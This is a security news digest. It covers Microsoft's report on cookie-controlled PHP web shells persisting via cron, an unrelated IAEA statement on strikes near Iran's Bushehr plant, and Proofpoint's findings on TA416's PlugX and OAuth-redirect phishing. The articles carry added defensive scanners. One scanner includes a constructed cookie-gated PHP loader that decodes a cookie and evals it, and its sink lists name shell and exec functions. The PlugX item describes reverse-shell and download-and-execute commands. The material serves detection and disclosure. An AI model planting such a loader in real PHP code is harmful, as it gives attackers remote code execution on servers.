
  • Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers

    Ravie Lakshmanan, Apr 03, 2026, Linux / Server Hardening

    Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers and to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team.

    “Instead of exposing command execution through URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution, pass instructions, and activate malicious functionality,” the tech giant said.

    The approach offers added stealth as it allows malicious code to stay dormant during normal application execution and activate the web shell logic only when specific cookie values are present. This behavior, Microsoft noted, extends to web requests, scheduled tasks, and trusted background workers.

    The malicious activity takes advantage of the fact that cookie values are available at runtime through the $_COOKIE superglobal, so attacker-supplied input can be consumed without any additional parsing. The technique is also unlikely to raise red flags: cookies blend into normal web traffic, and web server access logs in their default formats do not record cookie values, which reduces visibility for defenders.


    The cookie-controlled execution model comes in different implementations –

    • A PHP loader that uses multiple layers of obfuscation and runtime checks before parsing structured cookie input to execute an encoded secondary payload.
    • A PHP script that segments structured cookie data to reconstruct operational components such as file handling and decoding functions, and conditionally writes a secondary payload to disk and executes it.
    • A PHP script that uses a single cookie value as a marker to trigger threat actor-controlled actions, including execution of supplied input and file upload.
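    All three implementations share one observable: a value read from $_COOKIE is decoded, handed to an execution or file-writing function, or used as the condition that guards such a call. The following is an added example, not Microsoft's code and not a sample from its report: a line-oriented static check over PHP source that flags exactly those patterns. Both PHP snippets it scans are constructed for the example; the sink and decoder lists are the usual suspects rather than anything the report enumerates.

```python
"""Heuristic scanner for cookie-gated PHP web shells.

Added example, not Microsoft's code and not a sample from its report: a
line-oriented static check that flags PHP source where a value read from
$_COOKIE is decoded, reaches an execution or file sink, or gates a block
that contains such a sink. Both PHP snippets below are constructed.
"""
import re
from dataclasses import dataclass

# Calls that turn attacker-controlled data into code, commands or files.
EXEC_SINKS = {
    "eval", "assert", "system", "exec", "shell_exec", "passthru", "popen",
    "proc_open", "create_function", "file_put_contents", "move_uploaded_file",
    "include", "include_once", "require", "require_once",
}
# Decoders typically wrapped around the cookie value before it is executed.
DECODERS = {"base64_decode", "gzinflate", "gzuncompress", "str_rot13",
            "hex2bin", "urldecode", "unserialize"}

ASSIGN_RE = re.compile(r"\$([A-Za-z_]\w*)\s*=\s*[^;]*\$_COOKIE")  # $x = ... $_COOKIE
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")                     # name(
IF_RE = re.compile(r"\bif\s*\(")


@dataclass
class Finding:
    line: int
    reason: str
    text: str


def scan_php(source: str) -> list[Finding]:
    """Return findings for one PHP file; an empty list means nothing matched."""
    findings: list[Finding] = []
    tainted: set[str] = set()   # variables assigned from $_COOKIE
    gated = False               # inside an if (...) that tests a cookie value
    depth = 0                   # brace depth relative to that if
    for lineno, line in enumerate(source.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith(("//", "#", "*")):
            continue
        for m in ASSIGN_RE.finditer(line):
            tainted.add(m.group(1))
        uses_cookie = "$_COOKIE" in line or any(
            re.search(rf"\${v}\b", line) for v in tainted)
        if IF_RE.search(line) and uses_cookie:
            gated, depth = True, 0
        depth += line.count("{") - line.count("}")
        if gated and depth <= 0 and "}" in line:
            gated = False           # the cookie-gated block has closed
        calls = set(CALL_RE.findall(line))
        if calls & EXEC_SINKS and uses_cookie:
            findings.append(Finding(lineno, "cookie value reaches execution sink", stripped))
        elif calls & DECODERS and uses_cookie:
            findings.append(Finding(lineno, "cookie value decoded before use", stripped))
        elif gated and calls & EXEC_SINKS:
            findings.append(Finding(lineno, "execution sink inside cookie-gated block", stripped))
    return findings


# Constructed sample of a cookie-gated loader (not an observed file): dormant
# unless the marker cookie is present, then decodes and evals a second cookie.
COOKIE_SHELL = """\
<?php
// constructed sample of a cookie-gated loader, not an observed file
$k = $_COOKIE['sess_tok'];
if ($k === 'activate') {
    $p = base64_decode($_COOKIE['data']);
    eval($p);
}
"""

# Constructed benign use of a cookie: validated, never executed.
BENIGN = """\
<?php
$lang = $_COOKIE['lang'] ?? 'en';
if (!in_array($lang, ['en', 'de'], true)) {
    $lang = 'en';
}
echo htmlspecialchars($lang);
"""

if __name__ == "__main__":
    for f in scan_php(COOKIE_SHELL):
        print(f"line {f.line}: {f.reason}: {f.text}")
    print("benign findings:", scan_php(BENIGN))
```

    The check is deliberately cheap so it can run over an entire web root on a schedule; obfuscated loaders that reassemble function names from string fragments will slip past the name-based sink list, which is why the report pairs file-level checks with cron auditing and monitoring for new files in web directories.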

    In at least one case, the threat actor obtained initial access to a victim's hosted Linux environment, either with valid credentials or by exploiting a known security vulnerability, and then set up a cron job that periodically invokes a shell routine to recreate and execute an obfuscated PHP loader.

    This “self-healing” architecture allows the PHP loader to be repeatedly recreated by the scheduled task even if it was removed as part of cleanup and remediation efforts, thereby creating a reliable and persistent remote code execution channel. Once the PHP loader is deployed, it remains inactive during normal traffic and springs into action upon receiving HTTP requests with specific cookie values. 

    “By shifting execution control into cookies, the web shell can remain hidden in normal traffic, activating only during deliberate interactions,” Microsoft added. “By separating persistence through cron-based re-creation from execution control through cookie-gated activation, the threat actor reduced operational noise and limited observable indicators in routine application logs.”

    A common aspect that ties together all the aforementioned implementations is the use of obfuscation to conceal sensitive functionality and cookie-based gating to initiate the malicious action, while leaving a minimal interactive footprint.


    To counter the threat, Microsoft recommends enforcing multi-factor authentication for hosting control panels, SSH access, and administrative interfaces; monitoring for unusual login activity; restricting the execution of shell interpreters; auditing cron jobs and scheduled tasks across web servers; checking for suspicious file creation in web directories; and limiting hosting control panels’ shell capabilities.

    “The consistent use of cookies as a control mechanism suggests reuse of established web shell tradecraft,” Microsoft said. “By shifting control logic into cookies, threat actors enable persistent post-compromise access that can evade many traditional inspection and logging controls.”

    “Rather than relying on complex exploit chains, the threat actor leveraged legitimate execution paths already present in the environment, including web server processes, control panel components, and cron infrastructure, to stage and preserve malicious code.”




  • IAEA Sounds Alarm on US-Israeli Strike Near Iran Nuclear Plant

    At least one person was killed in the strike near Iran’s Bushehr nuclear plant, raising safety concerns.


    The director general of the International Atomic Energy Agency on Saturday demanded “maximum military restraint” from the U.S. and Israel as it confirmed reports that strikes had targeted a location close to Iran’s Bushehr Nuclear Power Plant, killing at least one person.

    In a statement released via social media, the IAEA relayed a message from Director General Rafael Mariano Grossi, who expressed “deep concern about the reported incident.”

    Grossi warned that nuclear power plants or nearby areas “must never be attacked,” noting that auxiliary site buildings may contain vital safety equipment, and stressed “the paramount importance of adhering to the seven pillars for ensuring nuclear safety and security during a conflict.”

    The IAEA said the attack near the Bushehr plant, Iran’s only operational nuclear power facility, was the fourth such attack since Israel and the U.S. began their invasion of Iran on February 28. The plant lies in a city inhabited by about 250,000 people.

    A security staff member was killed by a projectile fragment and a building on the Bushehr site was impacted by shockwaves and fragments. Grossi said that no increase in radiation levels was reported.

    Iranian Foreign Minister Abbas Araghchi also condemned the Bushehr strike and issued a reminder of the “Western outrage about hostilities near Zaporizhzhia Nuclear Power Plant in Ukraine” when Russia attacked the site.

    “Israel-U.S. have bombed our Bushehr plant four times now. Radioactive fallout will end life in [Gulf Cooperation Council] capitals, not Tehran. Attacks on our petrochemicals also convey real objectives,” said Araghchi.

    Al Jazeera reported that at least two petrochemical facilities had been hit by the U.S. and Israel in southern Iran’s Khuzestan province, an energy hub in the country. At least five people were injured in those attacks.

    Iranian news agency Mehr reported that the state-run Bandar Imam petrochemical complex, which produces liquefied petroleum gas and chemicals as well as other products, sustained damage.

    President Donald Trump said late last month that he would delay any attacks on Iran’s energy infrastructure until April 6 and said the delay was “subject to the success of the ongoing meetings and discussions.”

    He has threatened to destroy Iran’s power plants and other civilian infrastructure unless Iranian leaders end the blockade of the Strait of Hormuz, the oil export waterway. Iran began the blockade in retaliation for the U.S.-Israeli strikes that started more than a month ago, and it has fueled skyrocketing global energy prices.

    The threat amounted to Trump warning that he could soon commit a war crime, said international law experts.


  • China-Linked TA416 Targets European Governments with PlugX and OAuth-Based Phishing

    A China-aligned threat actor has set its sights on European government and diplomatic organizations since mid-2025, following a two-year period of minimal targeting in the region.

    The campaign has been attributed to TA416, a cluster of activity that overlaps with DarkPeony, RedDelta, Red Lich, SmugX, UNC6384, and Vertigo Panda.

    “This TA416 activity included multiple waves of web bug and malware delivery campaigns against diplomatic missions to the European Union and NATO across a range of European countries,” Proofpoint researchers Mark Kelly and Georgi Mladenov said.

    “Throughout this period, TA416 regularly altered its infection chain, including abusing Cloudflare Turnstile challenge pages, abusing OAuth redirects, and using C# project files, as well as frequently updating its custom PlugX payload.”

    TA416 has also been observed orchestrating multiple campaigns aimed at diplomatic and government entities in the Middle East following the outbreak of the U.S.-Israel-Iran conflict in late February 2026. The effort is likely an attempt to gather regional intelligence pertaining to the conflict, the enterprise security company added.

    It’s worth mentioning here that TA416 also shares historical technical overlaps with another cluster known as Mustang Panda (aka CerenaKeeper, Red Ishtar, and UNK_SteadySplit). The two activity groups are collectively tracked under the monikers Earth Preta, Hive0154, HoneyMyte, Stately Taurus, Temp.HEX, and Twill Typhoon. 

    While TA416’s attacks are characterized by the use of bespoke PlugX variants, the Mustang Panda cluster has repeatedly deployed tools like TONESHELL, PUBLOAD, and COOLCLIENT in recent attacks. What’s common to both of them is the use of DLL side-loading to launch the malware.


    TA416’s renewed focus on European entities is driven by a mix of web bug and malware delivery campaigns, with the threat actors using freemail sender accounts to conduct reconnaissance and deploy the PlugX backdoor via malicious archives hosted on Microsoft Azure Blob Storage, Google Drive, domains under their control, and compromised SharePoint instances. The PlugX malware campaigns were previously documented by StrikeReady and Arctic Wolf in October 2025.

    “A web bug (or tracking pixel) is a tiny invisible object embedded in an email that triggers an HTTP request to a remote server when opened, revealing the recipient’s IP address, user agent, and time of access, allowing the threat actor to assess whether the email was opened by the intended target,” Proofpoint said.

    Attacks carried out by TA416 in December 2025 have been found to leverage third-party Microsoft Entra ID cloud applications to initiate redirects that lead to the download of malicious archives. Phishing emails used as part of this attack wave contain a link to Microsoft’s legitimate OAuth authorization endpoint that, when clicked, redirects the user to the attacker-controlled domain and ultimately deploys PlugX.

    Microsoft itself warned last month of phishing campaigns targeting government and public-sector organizations that use OAuth URL redirection to bypass the conventional phishing defenses built into email clients and browsers.
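    The reason these links get through is that the first hop is a genuine Microsoft URL; what gives the lure away is where the authorization endpoint is asked to send the user afterwards. The following is an added example, not Proofpoint's or Microsoft's code: a mail-gateway style check that pulls the links out of a message and classifies any authorize-endpoint link by the host in its redirect_uri parameter. It relies only on the standard OAuth 2.0 authorization-request parameters; the identity-provider host list, the organisation's allowlist and the sample message are constructed for the example.

```python
"""Flag OAuth authorization links whose redirect_uri leaves the organisation.

Added example, not Proofpoint's or Microsoft's code: a mail-gateway style
check over the links in a message body. It relies only on the standard
OAuth 2.0 authorization-request parameters (the redirect_uri query
parameter of the /oauth2/.../authorize endpoint); the host list, the
allowlist and the sample message are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Identity-provider hosts whose authorize endpoint can bounce a user elsewhere.
AUTHORIZE_HOSTS = {"login.microsoftonline.com"}
# Where a legitimate post-login redirect for this (hypothetical) organisation may land.
TRUSTED_REDIRECT_SUFFIXES = (".example.gov", ".microsoft.com", ".office.com")
LINK_RE = re.compile(r"https?://[^\s<>\"']+")


def is_authorize_endpoint(url: str) -> bool:
    """True for https://login.microsoftonline.com/<tenant>/oauth2[/v2.0]/authorize."""
    p = urlsplit(url)
    host = (p.hostname or "").lower()
    return host in AUTHORIZE_HOSTS and "/oauth2/" in p.path and p.path.endswith("/authorize")


def classify_link(url: str, trusted=TRUSTED_REDIRECT_SUFFIXES) -> str:
    """'ignore' for non-authorize links, 'ok' when redirect_uri stays on a
    trusted host, otherwise 'suspicious-redirect'."""
    if not is_authorize_endpoint(url):
        return "ignore"
    query = parse_qs(urlsplit(url).query)
    redirect = query.get("redirect_uri", [""])[0]      # parse_qs already URL-decodes
    rhost = (urlsplit(redirect).hostname or "").lower()
    if rhost and any(rhost == t.lstrip(".") or rhost.endswith(t) for t in trusted):
        return "ok"
    return "suspicious-redirect"   # no redirect target, or one outside the allowlist


def scan_message(body: str) -> list[tuple[str, str]]:
    """Return (url, verdict) for every http(s) link found in the body."""
    return [(u, classify_link(u)) for u in LINK_RE.findall(body)]


# Constructed sample message: one lure link (redirect to an outside host),
# one legitimate sign-in link, one unrelated link. The client_id is a placeholder.
SAMPLE_BODY = """\
Dear colleague, the updated agenda is available here:
https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=constructed-app-id&response_type=code&scope=openid&redirect_uri=https%3A%2F%2Fdocs-share.example.net%2Fagenda
Sign in to the portal: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=constructed-app-id&response_type=code&redirect_uri=https%3A%2F%2Fportal.example.gov%2Fsignin-oidc
Press office: https://www.example.gov/news
"""

if __name__ == "__main__":
    for url, verdict in scan_message(SAMPLE_BODY):
        print(f"{verdict:20} {url}")
```

    Microsoft's endpoint only redirects to a redirect_uri registered on the application named by client_id, so a hit here means the link points at an app registration the organisation does not control, which matches the third-party Entra ID applications Proofpoint describes. The follow-up is to review which third-party applications users have consented to in the tenant rather than to block login.microsoftonline.com.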

    Further refinements to the attack chain were observed in February 2026, when TA416 began linking to archives hosted on Google Drive or a compromised SharePoint instance. The downloaded archives, in this case, include a legitimate Microsoft MSBuild executable and a malicious C# project file.

    “When the MSBuild executable is run, it searches the current directory for a project file and automatically builds it,” the researchers said. “In the observed TA416 activity, the CSPROJ file acts as a downloader, decoding three Base64-encoded URLs to fetch a DLL side-loading triad from a TA416-controlled domain, saving them to the user’s temp directory, and executing a legitimate executable to load PlugX via the group’s typical DLL side-loading chain.”
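    A project file that decodes Base64 URLs at build time leaves those URLs recoverable by anyone who can read the file. The following is an added example, not Proofpoint's tooling and not an observed TA416 project file: it walks every element text and attribute value in a .csproj, tries to Base64-decode alphabet-only tokens, and returns those that decode to http(s) URLs, which is enough to pull the three stage URLs out of a downloader of the shape the researchers describe. The project file and its URLs are constructed for the example.

```python
"""Recover decoded URLs from a suspicious MSBuild project file.

Added example, not Proofpoint's tooling and not an observed TA416 file: the
report says the CSPROJ downloader decodes three Base64-encoded URLs, so
this walks every element text and attribute value in a .csproj, tries to
Base64-decode alphabet-only tokens, and returns those that decode to
http(s) URLs. The project file and its URLs are constructed for the example.
"""
import base64
import binascii
import re
import xml.etree.ElementTree as ET

# Runs of Base64 alphabet characters long enough to hold a URL, plus padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_base64_urls(text: str) -> list[str]:
    """Return the URLs hidden in text as Base64; non-URL blobs are ignored."""
    urls = []
    for tok in B64_TOKEN.findall(text):
        try:
            decoded = base64.b64decode(tok, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue            # wrong padding, or not text at all
        if decoded.startswith(("http://", "https://")):
            urls.append(decoded)
    return urls


def extract_urls_from_csproj(xml_text: str) -> list[str]:
    """Walk the project XML in document order and collect decoded URLs."""
    found = []
    for el in ET.fromstring(xml_text).iter():
        for value in [el.text or "", *el.attrib.values()]:
            found.extend(decode_base64_urls(value))
    return found


# Constructed sample: three stage URLs stored as Base64 in project properties,
# the same decode-then-fetch shape the report describes. Hosts are placeholders.
CONSTRUCTED_URLS = [
    "https://cdn.example.net/host.exe",
    "https://cdn.example.net/helper.dll",
    "https://cdn.example.net/payload.dat",
]
_b64 = [base64.b64encode(u.encode()).decode() for u in CONSTRUCTED_URLS]
SAMPLE_CSPROJ = f"""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
    <StageA>{_b64[0]}</StageA>
    <StageB>{_b64[1]}</StageB>
    <StageC>{_b64[2]}</StageC>
  </PropertyGroup>
  <Target Name="Build">
    <Message Text="$(StageA) $(StageB) $(StageC)" Importance="high" />
  </Target>
</Project>
"""

if __name__ == "__main__":
    for url in extract_urls_from_csproj(SAMPLE_CSPROJ):
        print(url)
```

    The decoded hosts are the detection value here: they can be blocked at the proxy and searched for in web logs before anyone runs the project file. The same walk applies to any MSBuild input, so it also covers the case of a .csproj that hides its URLs in an attribute of an inline task rather than in a property.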

    The PlugX malware remains a consistent presence throughout TA416’s intrusions, although the legitimate, signed executables abused for DLL side-loading have varied over time. The backdoor is also known to establish an encrypted communication channel with its command-and-control (C2) server, but not before performing anti-analysis checks to sidestep detection.

    PlugX accepts five different commands –

    • 0x00000002, to capture system information
    • 0x00001005, to uninstall the malware
    • 0x00001007, to adjust beaconing interval and timeout parameter
    • 0x00003004, to download a new payload (EXE, DLL, or DAT) and execute it
    • 0x00007002, to open a reverse command shell

    “TA416’s shift back to European government targeting in mid-2025, following two years of focus on Southeast Asia and Mongolia, is consistent with a renewed intelligence-collection focus against EU and NATO-affiliated diplomacy entities,” Proofpoint said.


    “In addition, TA416’s expansion to Middle Eastern government targeting in March 2026 further highlights how the group’s tasking prioritization is likely influenced by geopolitical flashpoints and escalations. Throughout this period, the group has shown a willingness to iterate on infection chains, cycling through using fake Cloudflare Turnstile pages, OAuth redirect abuse, and MSBuild-based delivery, while continuing to update its customized PlugX backdoor.”

    The disclosure comes as Darktrace revealed that Chinese-nexus cyber operations have evolved from strategically-aligned activity in the 2010s to highly adaptive, identity-centric intrusions with an intent to establish long-term persistence within critical infrastructure networks.

    Based on a review of attack campaigns between July 2022 and September 2025, U.S.-based organizations accounted for 22.5% of all global events, followed by Italy, Spain, Germany, Thailand, the U.K., Panama, Colombia, the Philippines, and Hong Kong. A majority of cases (63%) involved the exploitation of internet-facing infrastructure (e.g., CVE-2025-31324 and CVE-2025-0994) to obtain initial access.

    “In one notable case, the actor had fully compromised the environment and established persistence, only to resurface in the environment more than 600 days after,” Darktrace said. “The operational pause underscores both the depth of the intrusion and the actor’s long‑term strategic intent.”


